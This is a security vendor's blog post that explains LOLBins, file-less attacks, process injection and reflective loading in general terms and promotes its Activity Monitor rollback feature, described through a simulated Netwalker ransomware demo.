Understanding LOLBins, File-less Attacks, and the Power of Activity Monitor

Introduction

In the rapidly evolving landscape of cyber security, threats continue to advance, demanding innovative approaches to protect against them. Two such sophisticated techniques that have gained prominence in recent years are LOLBins and file-less attacks. Individually potent, their combination poses a formidable challenge to traditional security measures. In this blog, we will delve into the intricacies of LOLBins and file-less attacks, explore their synergy, and introduce an advanced solution, Activity Monitor, designed to counteract these threats effectively. 

LOLBins and File-less Attacks

LOLBins refer to the use of legitimate, built-in system binaries or processes to execute malicious activities. By leveraging these trusted applications, attackers can camouflage their actions, making it difficult for traditional security measures to detect and respond effectively. Examples include PowerShell, WMI (Windows Management Instrumentation), and CertUtil. These LOLBins are native to the Windows operating system, making them inconspicuous and allowing attackers to work undetected.

File-less attacks, on the other hand, represent a departure from conventional malware tactics. Unlike traditional attacks that involve the installation of malicious files on a system's disk, file-less attacks operate entirely in memory, leaving no trace on the disk for security measures to detect.

When LOLBins and file-less attacks join forces, they create a potent synergy that poses a serious threat to cyber security. By using known clean applications, often overlooked by Host-based Intrusion Prevention Systems (HIPS), attackers can operate discreetly within a system. The absence of a malicious file landing on the disk makes it challenging for antivirus solutions to catch the malicious activity in action.

To further enhance their evasion tactics, attackers often employ techniques like process injections. This involves injecting malicious code into legitimate processes, such as explorer.exe. This method allows them to exploit the legitimacy of the host process while executing malicious actions, such as encrypting user files.

In our earlier blog post, we unveiled an advanced feature within WithSecure Elements Endpoint Protection called WithSecure Rollback. This functionality harnesses the power of our Activity Monitor technology, enabling users to effortlessly restore their devices to their original files and settings in the aftermath of a malware attack. While initially conceived to exclusively monitor unknown applications, we have taken this defence strategy a step further. Activity Monitor has now been enhanced to counteract advanced threats, such as LOLBins, file-less attacks, and process injections.

To highlight the advanced capabilities of the Activity Monitor, we have prepared a demonstration that simulate an attack by a Netwalker ransomware strain. In this case, Netwalker is represented by a PowerShell command containing an embedded DLL. This DLL, responsible for encrypting users' files, is dynamically loaded into the explorer.exe process using reflective loading.

Reflective loading is a technique to inject code into a target process without relying on traditional loading mechanisms. Unlike typical loading methods, such as dynamic linking or process hollowing, reflective loading allows the malicious code to be loaded directly from memory. This method enhances the stealth and evasiveness of the attack, as it doesn't involve the usual file-based loading processes that can be easily detected by security tools.

The demo illustrates how Activity Monitor not only identifies and rolls back malicious activities but also distinguishes between files created by users and modifications made by the ransomware within the same explorer.exe process. This level of intelligence is crucial in preventing data loss and system compromise.

As cyber threats evolve, so must our defence mechanisms. LOLBins, file-less attacks, and process injections represent the new frontier of cyber warfare, requiring innovative solutions to ensure the security of digital environments. With Activity Monitor, organizations can fortify their defences, providing a proactive and intelligent shield against even the most sophisticated adversaries.

Activity Monitor is part of TRUST AWARE, a project funded by the European Union's Horizon 2020 research and innovation program grant agreement 101021377.